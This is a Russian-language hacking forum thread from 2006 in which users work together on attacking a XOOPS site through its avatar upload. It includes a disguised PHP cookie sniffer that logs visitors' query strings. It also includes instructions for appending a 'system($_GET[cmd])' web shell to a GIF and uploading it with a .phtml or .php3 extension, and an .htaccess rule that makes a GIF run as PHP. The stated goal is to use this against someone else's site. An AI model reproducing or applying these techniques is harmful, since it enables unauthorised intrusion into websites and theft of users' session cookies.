ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 05.03.2006, 11:13
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами: 10840706

Репутация: 547


По умолчанию

Это значит что ты должен написать свой сниффер, но как я вижу ты в ПХП не силён, значить ты должен: 1) заказать его , 2) попросить друзей писать скрипт за тебя. Но есть выход воспользуйся Античатовским снифом вот он http://antichat.ru/cgi-bin/s.jpg.
 
Ответить с цитированием

  #12  
Старый 06.03.2006, 01:51
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
С нами: 10891700

Репутация: 3
По умолчанию

1 Гаврила пишет вот это MIME type not allowed: text/plain, и кстати только заметил не заливает он аватар только в ослике, в Opere спокойно проходит, странно... Лан аватор я залил, тольку толку... Не работает он, куков ни каких мне не приходит.

2 Tem Зачем мне писать то, что уже давно написано, вот скачал давно уже у меня на локалхосте работает, такой сниффер
Код:
<?php  $ip = getenv("REMOTE_ADDR");  $rhost = getenv(HTTP_REFERER);  $input = getenv(QUERY_STRING);  $date=(date("d.m.y"));  $time=(date("H:i"));  $fp = @fopen("snif.txt", "a");  @fputs($fp, "Дата: [ $date ] Время: [ $time ] IP: $ip Хост: $rhost Инфа $input \n");  @fclose($fp);  ?>
Обращаюсь к нему обычно так http://mysite/script.jpg
Кстати Tem если ты не заметил то код каторый мне дали указывает как раз на атичатовский сниффер, и странно бы было если я непопробывал бы первоначальный вариант скрипта, это потом я пробывал его править и указывать путь к разным снифферам...
 
Ответить с цитированием

  #13  
Старый 06.03.2006, 02:21
DetMyl
Участник форума
Регистрация: 17.12.2005
Сообщений: 121
С нами: 10735526

Репутация: 227
По умолчанию

Итак, смотрим в деталях:

--------------------------------------

Details
=======
User may upload valid image file with insecure extension through avatar
upload if "Allow custom avatar upload" is set to "Yes" in "User Info
Settings". This setting is not on in default installation. This is cause
of weak file extension validation XoopsMediaUploader class in file
uploader.php.

if ( preg_match( '/\.(php|cgi|pl|py|asp)$/i', $this->mediaName ) )

$this->setErrors('Filename rejected');
return false;
}

In some web server installation other extension like .phtml,*.php3 is
threat as php script.

------------------------------------------

откуда следует, что если разрешено заливать свои аватары, можно залить графический файл, расширение которого не .(php|cgi|pl|py|asp),
поэтому заливаем с расширением .phtml,*.php3, php5 и т.д., потом, на некоторых серваках файлы с такым расширением считаются PHP скриптами и соответственно интерпретируются.
Проблема в том что при заливке файла проверяется является ли он валидным(нормальным) графическим файлом, т.е. берем нормальный gif, открываем текстовым редактором и в конце набираем что-то типа <?php system($_GET[cmd]); ?> заливаем и открываем нашу картинку в броузере с параметром cmd=ls теоретически PHP проскакивает гиф часть и обрабатывает наш пхп код :-)
Вроде понятно обьяснил, есть вопросы, задавайте...

Последний раз редактировалось DetMyl; 06.03.2006 в 02:26..
 
Ответить с цитированием

  #14  
Старый 06.03.2006, 02:42
DetMyl
Участник форума
Регистрация: 17.12.2005
Сообщений: 121
С нами: 10735526

Репутация: 227
По умолчанию

А сниффер здесь не причем, так заливается шелл...
 
Ответить с цитированием

  #15  
Старый 06.03.2006, 22:31
LTK*
Познающий
Регистрация: 03.03.2006
Сообщений: 48
С нами: 10625481

Репутация: 11
По умолчанию

так ведь что б пхп выполнялся в гифе надо что б в конфиге серва было это разрешено... Не помню название файлика... сорри ... Вот, а попробуй менее актуальную но более эффективну багу: jpeg of death.
 
Ответить с цитированием

  #16  
Старый 07.03.2006, 02:30
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
С нами: 10891700

Репутация: 3
По умолчанию

DetMyl Сделал как ты сказал. Залил картинку на локалхост, и набрал в браузе такой адрес http://localhost/img.gif?cmd=ls Ни чего не произошло, залил в движок XOOPS этот гиф в виде аватара, обратилься по такому адресу к ней http://localhost/xoops/uploads/cavt4...af1.gif?cmd=ls Тажа история...
Что я тут не правильно делаю, или я неуловил что-то?
А если в конфиг надо править, то это не пойдёт, не часто встретиш сервы с разрешеннием выполнения пхп в гифе...

LTK* Что за бага такая jpeg of death и как её использовать. Можеш поконкретней?
 
Ответить с цитированием

  #17  
Старый 07.03.2006, 03:06
DetMyl
Участник форума
Регистрация: 17.12.2005
Сообщений: 121
С нами: 10735526

Репутация: 227
По умолчанию

не gif, файл должен иметь расширение phtml или php3
 
Ответить с цитированием

  #18  
Старый 07.03.2006, 03:18
TANZWUT
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
С нами: 10991846

Репутация: 2054


По умолчанию

Vovec, а ты создай на localhost в директории uploads файлик .htaccess и запиши в него:
Цитата:
<Files "cavt440cb44249af1.gif">
AddType application/x-httpd-php .gif
</Files>
вот тогда хоть чтото произойдёт...
__________________
Лучший способ защиты - это нападение!!!
 
Ответить с цитированием

  #19  
Старый 09.03.2006, 03:23
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
С нами: 10891700

Репутация: 3
По умолчанию

DetMyl при закачки аватора с разрешением php3 движок пишет Errors Returned While Uploading MIME type not allowed: application/octet-stream, если создаю такое разрешенние php3.gif аватара закачиваеться, но с какого то ... php3 обрезаеться и фаил становиться просто gif, если gif.php3 тажа история что и с расширение php3

TANZWUT ну сделал я так как ты сказал, браузер мне вывел всё содержимое этого файла и всё, а поидее если не ошибаюсь должен вылезти список всех папок и файлов в корне движка, да и чё толку мне от того если бы так было, на локалхосте я только проверяю, как я размещу на аттакуемом сайте в .htaccess это код.Админа чтоль попрошу)
 
Ответить с цитированием

  #20  
Старый 09.03.2006, 23:40
DetMyl
Участник форума
Регистрация: 17.12.2005
Сообщений: 121
С нами: 10735526

Репутация: 227
По умолчанию

Значит не дырявый сервер, в описании баги пишет "User may upload valid image file with insecure extension through avatar upload if "Allow custom avatar upload" is set to "Yes".This setting is not on in default installation."
A может быть мы что-то не так поняли
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Принцип работы антиличеров... Trinux PHP 18 26.08.2005 11:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.